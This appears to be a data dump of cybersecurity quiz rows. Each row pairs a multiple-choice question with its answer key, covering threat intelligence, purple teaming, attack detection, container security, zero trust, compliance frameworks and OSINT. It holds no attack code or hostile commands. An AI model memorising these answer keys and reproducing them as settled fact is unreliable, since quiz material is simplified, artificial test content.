(6264, 396, 'STIX is a:', 3, 'JSON format for threat intel', 0, 'Format', '2025-12-27 02:21:01', '[\"Transport protocol\", \"JSON format for threat intel\", \"Firewall rule\", \"Log format\"]'),
(6265, 396, 'TAXII is a:', 4, 'Transport protocol for STIX', 0, 'Transport', '2025-12-27 02:21:01', '[\"Data format\", \"Transport protocol for STIX\", \"SIEM\", \"EDR\"]'),
(6266, 396, 'What does TLP:RED mean?', 5, 'Not for disclosure outside recipient', 0, 'Restricted', '2025-12-27 02:21:01', '[\"Public\", \"Not for disclosure outside recipient\", \"Share widely\", \"Community only\"]'),
(6267, 396, 'Where do you push IOCs for enforcement?', 6, 'Firewall, Proxy, EDR', 0, 'Block', '2025-12-27 02:21:01', '[\"Only SIEM\", \"Firewall, Proxy, EDR\", \"Nowhere\", \"Email only\"]'),
(6268, 401, 'What is the Red Team\'s primary role?', 1, 'Offensive - simulate attacks to test defenses', 0, 'Offense', '2025-12-27 02:22:24', '[\"Defensive\", \"Offensive - simulate attacks to test defenses\", \"Compliance\", \"Training\"]'),
(6269, 401, 'What is Purple Teaming?', 2, 'Collaboration between Red and Blue teams', 0, 'Collab', '2025-12-27 02:22:24', '[\"Only offense\", \"Collaboration between Red and Blue teams\", \"Only defense\", \"Management\"]'),
(6270, 401, 'Why does Purple Teaming improve security?', 3, 'Red shares attack methods, Blue improves detection', 0, 'Learn together', '2025-12-27 02:22:24', '[\"It is cheaper\", \"Red shares attack methods, Blue improves detection\", \"More alerts\", \"Less work\"]'),
(6271, 402, 'What is an ROE in Red Team context?', 1, 'Rules of Engagement - defines scope and limits', 0, 'Rules', '2025-12-27 02:22:24', '[\"A tool\", \"Rules of Engagement - defines scope and limits\", \"A C2 framework\", \"A report\"]'),
(6272, 402, 'Which tool is used for AD attack path mapping?', 2, 'BloodHound', 0, 'Graph', '2025-12-27 02:22:24', '[\"Metasploit\", \"BloodHound\", \"Cobalt Strike\", \"Nmap\"]'),
(6273, 402, 'What is post-exploitation?', 3, 'Actions after initial access (persistence, lateral movement)', 0, 'After', '2025-12-27 02:22:24', '[\"Before hacking\", \"Actions after initial access (persistence, lateral movement)\", \"Cleanup\", \"Reporting\"]'),
(6274, 403, 'What does NDR focus on?', 1, 'Network Detection and Response', 0, 'Network', '2025-12-27 02:22:24', '[\"Endpoints\", \"Network Detection and Response\", \"Email\", \"Cloud\"]'),
(6275, 403, 'What is a honeytoken?', 2, 'Fake credential or data designed to alert on access', 0, 'Trap', '2025-12-27 02:22:24', '[\"Real password\", \"Fake credential or data designed to alert on access\", \"A log file\", \"A backup\"]'),
(6276, 403, 'How does Blue Team use MITRE ATT&CK?', 3, 'Map detection coverage and identify gaps', 0, 'Coverage', '2025-12-27 02:22:24', '[\"Attack systems\", \"Map detection coverage and identify gaps\", \"Delete logs\", \"Train users\"]'),
(6277, 404, 'What is an Atomic Test?', 1, 'Single technique execution with immediate validation', 0, 'Small test', '2025-12-27 02:22:24', '[\"Full attack simulation\", \"Single technique execution with immediate validation\", \"Discussion only\", \"Report writing\"]'),
(6278, 404, 'During Purple Team, what happens if Blue fails to detect?', 2, 'Create new detection rule or tune existing', 0, 'Improve', '2025-12-27 02:22:24', '[\"Blame Red\", \"Create new detection rule or tune existing\", \"Ignore it\", \"Delete logs\"]'),
(6279, 404, 'Why is real-time communication important in Purple Team?', 3, 'Blue can correlate activity in real-time', 0, 'Immediate', '2025-12-27 02:22:24', '[\"It is not\", \"Blue can correlate activity in real-time\", \"For fun\", \"To delay\"]'),
(6280, 405, 'What is the difference between pen testing and adversary emulation?', 1, 'Adversary emulation replicates specific threat actor TTPs', 0, 'Realistic', '2025-12-27 02:22:24', '[\"No difference\", \"Adversary emulation replicates specific threat actor TTPs\", \"Pen testing is better\", \"Emulation is cheaper\"]'),
(6281, 405, 'Which framework automates adversary emulation?', 2, 'MITRE Caldera', 0, 'Automated', '2025-12-27 02:22:24', '[\"Metasploit\", \"MITRE Caldera\", \"Wireshark\", \"Splunk\"]'),
(6282, 405, 'Why emulate a specific APT group?', 3, 'Test defenses against adversaries likely to target you', 0, 'Relevance', '2025-12-27 02:22:24', '[\"For fun\", \"Test defenses against adversaries likely to target you\", \"It is required\", \"To impress management\"]'),
(6283, 406, 'What is the Red Team\'s goal?', 1, 'Test defenses by simulating attacks', 0, 'Offense', '2025-12-27 02:22:24', '[\"Build tools\", \"Test defenses by simulating attacks\", \"Write reports\", \"Train users\"]'),
(6284, 406, 'What is Purple Teaming?', 2, 'Collaboration between Red and Blue', 0, 'Together', '2025-12-27 02:22:24', '[\"Only offense\", \"Collaboration between Red and Blue\", \"Only defense\", \"Compliance\"]'),
(6285, 406, 'Which tool extracts Windows credentials?', 3, 'Mimikatz', 0, 'Creds', '2025-12-27 02:22:24', '[\"BloodHound\", \"Mimikatz\", \"Cobalt Strike\", \"Nmap\"]'),
(6286, 406, 'What is a honeytoken?', 4, 'Fake data that alerts when accessed', 0, 'Trap', '2025-12-27 02:22:24', '[\"Password\", \"Fake data that alerts when accessed\", \"Log file\", \"Backup\"]'),
(6287, 406, 'What framework automates adversary emulation?', 5, 'MITRE Caldera', 0, 'Automation', '2025-12-27 02:22:24', '[\"Metasploit\", \"MITRE Caldera\", \"Wireshark\", \"Burp\"]'),
(6288, 406, 'What happens after Blue fails to detect in Purple Team?', 6, 'Create or improve detection rules', 0, 'Improve', '2025-12-27 02:22:24', '[\"Blame Red\", \"Create or improve detection rules\", \"Ignore it\", \"Fire someone\"]'),
(6289, 411, 'Why establish a baseline before exercises?', 1, 'To distinguish attack activity from normal behavior', 0, 'Compare', '2025-12-27 02:26:00', '[\"It is required by law\", \"To distinguish attack activity from normal behavior\", \"To slow things down\", \"No reason\"]'),
(6290, 411, 'What should be documented for each exercise?', 2, 'Technique, execution steps, expected detection, results', 0, 'Everything', '2025-12-27 02:26:00', '[\"Nothing\", \"Technique, execution steps, expected detection, results\", \"Only failures\", \"Only successes\"]'),
(6291, 411, 'Which tool provides a library of technique tests?', 3, 'Atomic Red Team', 0, 'Library', '2025-12-27 02:26:00', '[\"Splunk\", \"Atomic Red Team\", \"Wireshark\", \"Nmap\"]'),
(6292, 412, 'Which Sysmon Event ID indicates process access to LSASS?', 1, 'Event ID 10', 0, 'Access', '2025-12-27 02:26:00', '[\"Event ID 1\", \"Event ID 10\", \"Event ID 11\", \"Event ID 22\"]'),
(6293, 412, 'What is DCSync?', 2, 'Replicating AD credentials by impersonating a domain controller', 0, 'Replication', '2025-12-27 02:26:00', '[\"Syncing files\", \"Replicating AD credentials by impersonating a domain controller\", \"Backing up\", \"Logging\"]'),
(6294, 412, 'Which Windows event logs DCSync activity?', 3, 'Security Event 4662 (replication rights)', 0, 'AD', '2025-12-27 02:26:00', '[\"Sysmon 1\", \"Security Event 4662 (replication rights)\", \"Application log\", \"System log\"]'),
(6295, 413, 'What does PsExec create on the remote host?', 1, 'A service (PSEXESVC)', 0, 'Service', '2025-12-27 02:26:00', '[\"A file only\", \"A service (PSEXESVC)\", \"Nothing\", \"A registry key\"]'),
(6296, 413, 'Which parent-child relationship is suspicious for WMI?', 2, 'WmiPrvSE.exe spawning cmd.exe or powershell.exe', 0, 'Process tree', '2025-12-27 02:26:00', '[\"svchost → notepad\", \"WmiPrvSE.exe spawning cmd.exe or powershell.exe\", \"explorer → chrome\", \"lsass → svchost\"]'),
(6297, 413, 'Windows Event 7045 indicates:', 3, 'A new service was installed', 0, 'Service', '2025-12-27 02:26:00', '[\"Login\", \"A new service was installed\", \"File access\", \"Network connection\"]'),
(6298, 414, 'What indicates DNS tunneling?', 1, 'High query volume, unusually long subdomains', 0, 'DNS', '2025-12-27 02:26:00', '[\"Slow DNS\", \"High query volume, unusually long subdomains\", \"No DNS\", \"Fast DNS\"]'),
(6299, 414, 'Why monitor uploads to cloud storage domains?', 2, 'Attackers exfiltrate to Dropbox, Google Drive, etc.', 0, 'Cloud exfil', '2025-12-27 02:26:00', '[\"It is slow\", \"Attackers exfiltrate to Dropbox, Google Drive, etc.\", \"Cloud is unsafe\", \"For compliance\"]'),
(6300, 414, 'Which HTTP method is commonly used for exfiltration?', 3, 'POST', 0, 'Upload', '2025-12-27 02:26:00', '[\"GET\", \"POST\", \"DELETE\", \"HEAD\"]'),
(6301, 415, 'What does Detection Rate measure?', 1, 'Percentage of executed techniques that were detected', 0, 'Success', '2025-12-27 02:26:00', '[\"Speed\", \"Percentage of executed techniques that were detected\", \"Cost\", \"Size\"]'),
(6302, 415, 'Why use ATT&CK Navigator heatmaps?', 2, 'Visualize detection coverage across techniques', 0, 'Visualization', '2025-12-27 02:26:00', '[\"It is pretty\", \"Visualize detection coverage across techniques\", \"Required by law\", \"For fun\"]'),
(6303, 415, 'How often should Purple Team exercises occur?', 3, 'Regularly (monthly or quarterly)', 0, 'Recurring', '2025-12-27 02:26:00', '[\"Once ever\", \"Regularly (monthly or quarterly)\", \"Never\", \"Only after breaches\"]'),
(6304, 416, 'Which Sysmon event indicates process access to LSASS?', 1, 'Event ID 10', 0, 'Credential', '2025-12-27 02:26:00', '[\"1\", \"Event ID 10\", \"Event ID 11 \", \"Event ID 22\"]'),
(6305, 416, 'PsExec creates what on remote hosts?', 2, 'A service (PSEXESVC)', 0, 'Remote', '2025-12-27 02:26:00', '[\"A file\", \"A service (PSEXESVC)\", \"Nothing\", \"A user\"]'),
(6306, 416, 'DNS tunneling is characterized by:', 3, 'Long subdomains, high query volume', 0, 'DNS', '2025-12-27 02:26:00', '[\"Fast lookups\", \"Long subdomains, high query volume\", \"No queries\", \"Short names\"]'),
(6307, 416, 'Detection Rate formula:', 4, '(Detected / Executed) x 100', 0, 'Metric', '2025-12-27 02:26:00', '[\"Executed / Detected\", \"(Detected / Executed) x 100\", \"Random\", \"None\"]'),
(6308, 416, 'What should happen after deploying new detection?', 5, 'Re-test the technique', 0, 'Validate', '2025-12-27 02:26:00', '[\"Nothing\", \"Re-test the technique\", \"Delete old alerts\", \"Wait\"]'),
(6309, 416, 'What is Time to Detect (TTD)?', 6, 'Time between execution and alert', 0, 'Speed', '2025-12-27 02:26:00', '[\"Time to delete\", \"Time between execution and alert\", \"Time to report\", \"Time to lunch\"]'),
(6310, 421, 'How does container isolation differ from VMs?', 1, 'Containers share the host kernel; VMs have full kernel isolation', 0, 'Kernel', '2025-12-27 02:27:22', '[\"No difference\", \"Containers share the host kernel; VMs have full kernel isolation\", \"VMs are less secure\", \"Containers are slower\"]'),
(6311, 421, 'What is the risk of container escape?', 2, 'Attacker gains access to the host and other containers', 0, 'Host', '2025-12-27 02:27:22', '[\"Nothing\", \"Attacker gains access to the host and other containers\", \"Container restarts\", \"Performance drop\"]'),
(6312, 421, 'What standard provides Kubernetes hardening guidance?', 3, 'CIS Kubernetes Benchmark', 0, 'CIS', '2025-12-27 02:27:22', '[\"ISO 27001\", \"CIS Kubernetes Benchmark\", \"PCI DSS\", \"HIPAA\"]'),
(6313, 422, 'Why avoid --privileged flag?', 1, 'It gives the container full host capabilities', 0, 'Root', '2025-12-27 02:27:22', '[\"It is slow\", \"It gives the container full host capabilities\", \"It uses more memory\", \"No reason\"]'),
(6314, 422, 'What does --cap-drop=ALL do?', 2, 'Removes all Linux capabilities from the container', 0, 'Least privilege', '2025-12-27 02:27:22', '[\"Adds capabilities\", \"Removes all Linux capabilities from the container\", \"Drops the container\", \"Deletes files\"]'),
(6315, 422, 'Which tool audits Docker against CIS Benchmark?', 3, 'Docker Bench Security', 0, 'Audit', '2025-12-27 02:27:22', '[\"Nmap\", \"Docker Bench Security\", \"Wireshark\", \"Burp Suite\"]'),
(6316, 423, 'What does RBAC control in Kubernetes?', 1, 'Who can do what to which resources', 0, 'Access', '2025-12-27 02:27:22', '[\"Network traffic\", \"Who can do what to which resources\", \"Storage\", \"Logging\"]'),
(6317, 423, 'What is the most restrictive Pod Security Standard?', 2, 'Restricted', 0, 'Strict', '2025-12-27 02:27:22', '[\"Privileged\", \"Baseline\", \"Restricted\", \"None\"]'),
(6318, 423, 'Why use NetworkPolicy?', 3, 'Restrict pod-to-pod communication', 0, 'Segmentation', '2025-12-27 02:27:22', '[\"Faster network\", \"Restrict pod-to-pod communication\", \"More pods\", \"Easier config\"]'),
(6319, 424, 'Which tool scans container images for CVEs?', 1, 'Trivy', 0, 'Scanner', '2025-12-27 02:27:22', '[\"Nmap\", \"Trivy\", \"Wireshark\", \"Metasploit\"]'),
(6320, 424, 'What is Distroless?', 2, 'Container images with no shell or package manager', 0, 'Minimal', '2025-12-27 02:27:22', '[\"A Linux distro\", \"Container images with no shell or package manager\", \"A Docker command\", \"A network tool\"]'),
(6321, 424, 'Why sign container images?', 3, 'Verify provenance and prevent tampering', 0, 'Trust', '2025-12-27 02:27:22', '[\"Faster pulls\", \"Verify provenance and prevent tampering\", \"Smaller size\", \"No reason\"]'),
(6322, 425, 'What does Falco monitor?', 1, 'System calls (syscalls) at runtime', 0, 'Syscall', '2025-12-27 02:27:22', '[\"Network only\", \"System calls (syscalls) at runtime\", \"Files only\", \"Nothing\"]'),
(6323, 425, 'What is a behavioral baseline?', 2, 'Profile of normal container behavior to detect anomalies', 0, 'Normal', '2025-12-27 02:27:22', '[\"A security tool\", \"Profile of normal container behavior to detect anomalies\", \"A network policy\", \"A log file\"]'),
(6324, 425, 'What action can runtime security take on a threat?', 3, 'Kill, pause, or alert on the container', 0, 'Response', '2025-12-27 02:27:22', '[\"Nothing\", \"Kill, pause, or alert on the container\", \"Only log\", \"Restart host\"]'),
(6325, 426, 'Containers share what with the host?', 1, 'The kernel', 0, 'Shared', '2025-12-27 02:27:22', '[\"Nothing\", \"The kernel\", \"The filesystem only\", \"Memory only\"]'),
(6326, 426, 'What does --cap-drop=ALL do?', 2, 'Removes all Linux capabilities', 0, 'Restrict', '2025-12-27 02:27:22', '[\"Adds capabilities\", \"Removes all Linux capabilities\", \"Drops container\", \"Nothing\"]'),
(6327, 426, 'Which tool scans images for CVEs?', 3, 'Trivy', 0, 'Scanner', '2025-12-27 02:27:22', '[\"Nmap\", \"Trivy\", \"Docker\", \"Kubernetes\"]'),
(6328, 426, 'What does RBAC control?', 4, 'Who can access which resources', 0, 'Access', '2025-12-27 02:27:22', '[\"Network\", \"Who can access which resources\", \"Storage\", \"CPU\"]'),
(6329, 426, 'What does Falco monitor?', 5, 'System calls at runtime', 0, 'Runtime', '2025-12-27 02:27:22', '[\"Images\", \"System calls at runtime\", \"Network only\", \"Logs\"]'),
(6330, 426, 'Why use minimal base images?', 6, 'Fewer vulnerabilities, smaller attack surface', 0, 'Less CVEs', '2025-12-27 02:27:22', '[\"Faster\", \"Fewer vulnerabilities, smaller attack surface\", \"Prettier\", \"Cheaper\"]'),
(6331, 431, 'What is the Zero Trust motto?', 1, 'Never trust, always verify', 0, 'Motto', '2025-12-27 02:28:42', '[\"Trust everyone\", \"Never trust, always verify\", \"Trust but verify\", \"Always trust\"]'),
(6332, 431, 'What does \"Assume Breach\" mean?', 2, 'Design security as if attackers are already inside', 0, 'Mindset', '2025-12-27 02:28:42', '[\"Panic\", \"Design security as if attackers are already inside\", \"Give up\", \"Trust more\"]'),
(6333, 431, 'Which NIST document defines Zero Trust Architecture?', 3, 'SP 800-207', 0, 'Standard', '2025-12-27 02:28:42', '[\"SP 800-53\", \"SP 800-207\", \"SP 800-171\", \"SP 800-61\"]'),
(6334, 432, 'In Zero Trust, what replaces network location as the trust boundary?', 1, 'Identity', 0, 'Who', '2025-12-27 02:28:42', '[\"Firewall\", \"Identity\", \"IP address\", \"VPN\"]'),
(6335, 432, 'What is phishing-resistant MFA?', 2, 'FIDO2/WebAuthn hardware keys', 0, 'Strong', '2025-12-27 02:28:42', '[\"SMS codes\", \"FIDO2/WebAuthn hardware keys\", \"Email codes\", \"Security questions\"]'),
(6336, 432, 'Conditional Access decisions are based on:', 3, 'User, device, location, and application risk signals', 0, 'Signals', '2025-12-27 02:28:42', '[\"Random\", \"User, device, location, and application risk signals\", \"Time only\", \"IP only\"]'),
(6337, 433, 'What does microsegmentation prevent?', 1, 'Lateral movement after initial compromise', 0, 'Contain', '2025-12-27 02:28:42', '[\"Authentication\", \"Lateral movement after initial compromise\", \"Logging\", \"Faster network\"]'),
(6338, 433, 'What does ZTNA replace?', 2, 'Traditional VPN', 0, 'VPN', '2025-12-27 02:28:42', '[\"Firewall\", \"Traditional VPN\", \"SIEM\", \"EDR\"]'),
(6339, 433, 'Microsegmentation uses what type of traffic rules?', 3, 'Identity/context-based, not just IP', 0, 'Context', '2025-12-27 02:28:42', '[\"IP only\", \"Identity/context-based, not just IP\", \"Random\", \"None\"]'),
(6340, 434, 'What is continuous verification?', 1, 'Evaluating trust throughout the session, not just at login', 0, 'Ongoing', '2025-12-27 02:28:42', '[\"One-time check\", \"Evaluating trust throughout the session, not just at login\", \"Weekly audit\", \"Never check\"]'),
(6341, 434, 'What is a step-up authentication?', 2, 'Requiring additional verification when risk increases', 0, 'More MFA', '2025-12-27 02:28:42', '[\"Login\", \"Requiring additional verification when risk increases\", \"Password reset\", \"Logout\"]'),
(6342, 434, 'UEBA provides:', 3, 'User and entity behavior analytics', 0, 'Behavior', '2025-12-27 02:28:42', '[\"Firewall rules\", \"User and entity behavior analytics\", \"Encryption\", \"Backups\"]'),
(6343, 435, 'What is the first step in Zero Trust implementation?', 1, 'Identify users, devices, applications, and data', 0, 'Discovery', '2025-12-27 02:28:42', '[\"Deploy firewall\", \"Identify users, devices, applications, and data\", \"Buy tools\", \"Hire staff\"]'),
(6344, 435, 'What are \"Quick Wins\" for Zero Trust?', 2, 'MFA everywhere, conditional access, EDR', 0, 'Easy', '2025-12-27 02:28:42', '[\"Nothing\", \"MFA everywhere, conditional access, EDR\", \"Complete overhaul\", \"Do nothing\"]'),
(6345, 435, 'What should you protect first?', 3, 'Crown jewels (most critical assets)', 0, 'Priority', '2025-12-27 02:28:42', '[\"Everything equally\", \"Crown jewels (most critical assets)\", \"Nothing\", \"Random\"]'),
(6346, 436, 'Zero Trust motto is:', 1, 'Never trust, always verify', 0, 'Motto', '2025-12-27 02:28:42', '[\"Always trust\", \"Never trust, always verify\", \"Trust everyone\", \"Trust but verify\"]'),
(6347, 436, 'In Zero Trust, what is the new perimeter?', 2, 'Identity', 0, 'Boundary', '2025-12-27 02:28:42', '[\"Firewall\", \"Identity\", \"VPN\", \"Router\"]'),
(6348, 436, 'ZTNA replaces:', 3, 'Traditional VPN', 0, 'Access', '2025-12-27 02:28:42', '[\"SIEM\", \"Traditional VPN\", \"EDR\", \"Antivirus\"]'),
(6349, 436, 'Microsegmentation prevents:', 4, 'Lateral movement', 0, 'Contain', '2025-12-27 02:28:42', '[\"Authentication\", \"Lateral movement\", \"Logging\", \"Backup\"]'),
(6350, 436, 'Continuous verification means:', 5, 'Trust is evaluated throughout the session', 0, 'Ongoing', '2025-12-27 02:28:42', '[\"One check\", \"Trust is evaluated throughout the session\", \"Never check\", \"Weekly\"]'),
(6351, 436, 'First step in ZT implementation:', 6, 'Identify users, devices, apps, data', 0, 'Discovery', '2025-12-27 02:28:42', '[\"Buy tools\", \"Identify users, devices, apps, data\", \"Hire\", \"Nothing\"]'),
(6352, 441, 'What is the difference between a framework and compliance?', 1, 'Framework is guidance; compliance is mandatory requirements', 0, 'Difference', '2025-12-27 02:30:07', '[\"Same thing\", \"Framework is guidance; compliance is mandatory requirements\", \"Compliance is optional\", \"Framework is mandatory\"]'),
(6353, 441, 'Why do organizations adopt security frameworks?', 2, 'Common language, best practices, risk management', 0, 'Benefits', '2025-12-27 02:30:07', '[\"For fun\", \"Common language, best practices, risk management\", \"To slow things down\", \"No reason\"]'),
(6354, 441, 'What is an audit?', 3, 'Verification that requirements are met', 0, 'Check', '2025-12-27 02:30:07', '[\"Sales pitch\", \"Verification that requirements are met\", \"Training\", \"Party\"]'),
(6355, 442, 'How many core functions are in NIST CSF?', 1, '5 (Identify, Protect, Detect, Respond, Recover)', 0, 'Five', '2025-12-27 02:30:07', '[\"3\", \"5 (Identify, Protect, Detect, Respond, Recover)\", \"7\", \"10\"]'),
(6356, 442, 'What is a \"Profile\" in NIST CSF?', 2, 'Current or target state of cybersecurity posture', 0, 'State', '2025-12-27 02:30:07', '[\"A social media page\", \"Current or target state of cybersecurity posture\", \"A firewall rule\", \"A user account\"]'),
(6357, 442, 'Which tier represents continuous improvement?', 3, 'Tier 4 - Adaptive', 0, 'Best', '2025-12-27 02:30:07', '[\"Tier 1\", \"Tier 2\", \"Tier 3\", \"Tier 4 - Adaptive\"]'),
(6358, 443, 'What does ISMS stand for?', 1, 'Information Security Management System', 0, 'ISMS', '2025-12-27 02:30:07', '[\"Internal Security Monitoring System\", \"Information Security Management System\", \"Internet Security Module Standard\", \"None\"]'),
(6359, 443, 'How long is ISO 27001 certification valid?', 2, '3 years with annual surveillance audits', 0, 'Three', '2025-12-27 02:30:07', '[\"Forever\", \"3 years with annual surveillance audits\", \"1 year\", \"Monthly\"]'),
(6360, 443, 'What is the purpose of ISO 27002?', 3, 'Guidance on implementing ISO 27001 controls', 0, 'How-to', '2025-12-27 02:30:07', '[\"Certification\", \"Guidance on implementing ISO 27001 controls\", \"Auditing\", \"Pricing\"]'),
(6361, 444, 'Which SOC 2 criterion is always required?', 1, 'Security', 0, 'Core', '2025-12-27 02:30:07', '[\"Availability\", \"Privacy\", \"Security\", \"Integrity\"]'),
(6362, 444, 'What is the difference between SOC 2 Type I and Type II?', 2, 'Type I is point-in-time; Type II tests over a period', 0, 'Duration', '2025-12-27 02:30:07', '[\"Same thing\", \"Type I is point-in-time; Type II tests over a period\", \"Type II is faster\", \"Type I is better\"]'),
(6363, 444, 'Who performs SOC 2 audits?', 3, 'CPA firm (independent auditors)', 0, 'Auditor', '2025-12-27 02:30:07', '[\"Internal team\", \"CPA firm (independent auditors)\", \"Customers\", \"Anyone\"]'),
(6364, 445, 'How many requirements does PCI-DSS have?', 1, '12', 0, 'Twelve', '2025-12-27 02:30:07', '[\"5\", \"10\", \"12\", \"20\"]'),
(6365, 445, 'What does HIPAA protect?', 2, 'PHI (Protected Health Information)', 0, 'Health', '2025-12-27 02:30:07', '[\"Credit cards\", \"PHI (Protected Health Information)\", \"IP addresses\", \"Passwords\"]'),
(6366, 445, 'What is the HIPAA Breach Notification Rule?', 3, 'Report breaches within 60 days', 0, 'Notify', '2025-12-27 02:30:07', '[\"Delete data\", \"Report breaches within 60 days\", \"Hide breach\", \"Nothing\"]'),
(6367, 446, 'NIST CSF has how many core functions?', 1, '5', 0, 'Functions', '2025-12-27 02:30:07', '[\"3\", \"5\", \"7\", \"10\"]'),
(6368, 446, 'ISO 27001 certification lasts:', 2, '3 years', 0, 'Duration', '2025-12-27 02:30:07', '[\"Forever\", \"1 year\", \"3 years\", \"5 years\"]'),
(6369, 446, 'Which SOC 2 criterion is mandatory?', 3, 'Security', 0, 'Required', '2025-12-27 02:30:07', '[\"Privacy\", \"Availability\", \"Security\", \"Integrity\"]'),
(6370, 446, 'PCI-DSS has how many requirements?', 4, '12', 0, 'Count', '2025-12-27 02:30:07', '[\"5\", \"10\", \"12\", \"15\"]'),
(6371, 446, 'HIPAA protects:', 5, 'Protected Health Information (PHI)', 0, 'Health', '2025-12-27 02:30:07', '[\"Credit cards\", \"Protected Health Information (PHI)\", \"Passwords\", \"IP addresses\"]'),
(6372, 446, 'SOC 2 Type II tests controls over:', 6, 'A period of time (6-12 months)', 0, 'Duration', '2025-12-27 02:30:07', '[\"One day\", \"A period of time (6-12 months)\", \"One hour\", \"Never\"]'),
(6976, 765, 'What transforms \"Data\" into \"Intelligence\"?', 1, 'Analysis and Context', 0, 'Data needs processing and analysis to become useful.', '2025-12-29 13:30:44', '[\"Storage\", \"Encryption\", \"Analysis and Context\", \"Transmission\"]'),
(6977, 765, 'Which is an example of \"Intelligence\"?', 2, 'A report advising to block an IP due to active ransomware targeting your industry', 0, 'Intelligence is actionable and relevant.', '2025-12-29 13:30:44', '[\"A log file\", \"A list of IP addresses\", \"A report advising to block an IP due to active ransomware targeting your industry\", \"A spreadsheet of users\"]'),
(6978, 765, 'What is the primary goal of CTI?', 3, 'To support decision making', 0, 'CTI gives stakeholders the info they need to decide.', '2025-12-29 13:30:44', '[\"To hack back\", \"To support decision making\", \"To replace firewalls\", \"To find software bugs\"]'),
(6979, 766, 'Which phase involves setting the goals and requirements?', 1, 'Direction', 0, 'Also called Planning & Direction.', '2025-12-29 13:30:45', '[\"Collection\", \"Direction\", \"Analysis\", \"Feedback\"]'),
(6980, 766, 'Translating a document from Russian to English happens in which phase?', 2, 'Processing', 0, 'Processing converts raw data into a usable format.', '2025-12-29 13:30:45', '[\"Processing\", \"Analysis\", \"Collection\", \"Dissemination\"]'),
(6981, 766, 'Why is Feedback important?', 3, 'It improves future intelligence cycles', 0, 'Feedback ensures the intel met the needs of the consumer.', '2025-12-29 13:30:45', '[\"It saves money\", \"It improves future intelligence cycles\", \"It is required by law\", \"It deletes old data\"]'),
(6982, 767, 'Who is the primary audience for Strategic Intelligence?', 1, 'Executives / CISO', 0, 'High-level decision makers.', '2025-12-29 13:30:45', '[\"SOC Analyst\", \"Penetration Tester\", \"Executives / CISO\", \"Firewall Administrator\"]'),
(6983, 767, 'A list of malicious IP addresses is what type of intelligence?', 2, 'Tactical', 0, 'Tactical intel is used for immediate blocking/detection (IOCs).', '2025-12-29 13:30:45', '[\"Strategic\", \"Operational\", \"Tactical\", \"Technical\"]'),
(6984, 767, 'Information about an adversary\'s habits (TTPs) is...', 3, 'Operational', 0, 'Operational intel explains \"How\" the adversary operates.', '2025-12-29 13:30:45', '[\"Operational\", \"Strategic\", \"Tactical\", \"None\"]'),
(6985, 768, 'What is the \"Pyramid of Value\" order from bottom to top?', 1, 'Data > Information > Intelligence', 0, 'Raw Data -> Processed Info -> Actionable Intel.', '2025-12-29 13:30:45', '[\"Intelligence > Information > Data\", \"Data > Information > Intelligence\", \"Data > Intelligence > Information\", \"None\"]'),
(6986, 768, 'Which phase comes AFTER Collection?', 2, 'Processing', 0, 'After collecting raw data, you must process it.', '2025-12-29 13:30:45', '[\"Direction\", \"Analysis\", \"Processing\", \"Dissemination\"]'),
(6987, 768, 'Tactical Intelligence is best consumed by...', 3, 'Automated Systems / SOC Analysts', 0, 'Machines (SIEM) need lists of IPs/Hashes.', '2025-12-29 13:30:45', '[\"Board of Directors\", \"Automated Systems / SOC Analysts\", \"HR Department\", \"Legal Team\"]'),
(6988, 768, 'Strategic Intelligence focuses on...', 4, 'Long-term risk and trends', 0, 'Big picture for executives.', '2025-12-29 13:30:45', '[\"Long-term risk and trends\", \"Daily alerts\", \"Malware reverse engineering\", \"Network packets\"]'),
(6989, 768, 'What does \"TTP\" stand for?', 5, 'Tactics, Techniques, and Procedures', 0, 'TTPs describe adversary behavior.', '2025-12-29 13:30:45', '[\"Tactics, Techniques, and Procedures\", \"Time To Patch\", \"Threat Tech Protocol\", \"Total Threat Protection\"]'),
(6990, 768, 'In the Intelligence Cycle, what happens during \"Dissemination\"?', 6, 'Intelligence is delivered to consumers', 0, 'Sharing the finished product.', '2025-12-29 13:30:45', '[\"Data is encrypted\", \"Intelligence is delivered to consumers\", \"Data is collected\", \"Requirements are set\"]'),
(6991, 768, 'Why is \"Direction\" the first phase?', 7, 'To define requirements so we know what to look for', 0, 'You need a goal before you start collecting.', '2025-12-29 13:30:45', '[\"To save time\", \"To define requirements so we know what to look for\", \"It is the easiest\", \"Collection is actually first\"]'),
(6992, 768, 'Which is an example of \"Operational\" Intelligence?', 8, 'Report on APT28\'s phishing methods', 0, 'Focuses on Actor behaviors and campaigns.', '2025-12-29 13:30:45', '[\"Hash: abc12345\", \"Global cybercrime cost report\", \"Report on APT28\'s phishing methods\", \"A firewall log\"]'),
(6993, 768, 'What is \"Data\"?', 9, 'Raw, unprocessed facts', 0, 'The base of the pyramid.', '2025-12-29 13:30:45', '[\"Analyzed insight\", \"Raw, unprocessed facts\", \"Contextualized info\", \"A report\"]'),
(6994, 768, 'Feedback helps to...', 10, 'Close the loop and improve the next cycle', 0, 'Continuous improvement.', '2025-12-29 13:30:45', '[\"Close the loop and improve the next cycle\", \"Delete data\", \"Stop the cycle\", \"Archive logs\"]'),
(6995, 769, 'What defines OSINT?', 1, 'Data from publicly available sources', 0, 'Open Source = Public.', '2025-12-29 13:30:45', '[\"Hacking servers\", \"Data from publicly available sources\", \"Spying on private emails\", \"Inside knowledge\"]'),
(6996, 769, 'Which is an example of Passive Reconnaissance?', 2, 'Searching Google for the company name', 0, 'Passive means no direct contact with the target systems.', '2025-12-29 13:30:45', '[\"Port scanning the target\", \"Trying to login\", \"Searching Google for the company name\", \"Sending a phishing email\"]'),
(6997, 769, 'What is a \"Sock Puppet\"?', 3, 'A fake online identity used for research', 0, 'Used to protect your real identity during investigations.', '2025-12-29 13:30:45', '[\"A type of malware\", \"A fake online identity used for research\", \"A VPN provider\", \"A hacking tool\"]'),
(6998, 770, 'Which DNS record shows the IP address of a domain?', 1, 'A', 0, 'A record maps Name to IPv4.', '2025-12-29 13:30:45', '[\"MX\", \"A\", \"TXT\", \"NS\"]'),
(6999, 770, 'What is the best source for finding subdomains via SSL certificates?', 2, 'Certificate Transparency Logs (crt.sh)', 0, 'CT logs serve as a permanent record of all issued certificates.', '2025-12-29 13:30:45', '[\"WHOIS\", \"Certificate Transparency Logs (crt.sh)\", \"Ping\", \"Traceroute\"]'),
(7000, 770, 'Why check MX records?', 3, 'To see who handles their email (e.g., Google vs Microsoft)', 0, 'Mail Exchanger records point to the mail server.', '2025-12-29 13:30:45', '[\"To find the website IP\", \"To see who handles their email (e.g., Google vs Microsoft)\", \"To find employee passwords\", \"To see browsing history\"]'),
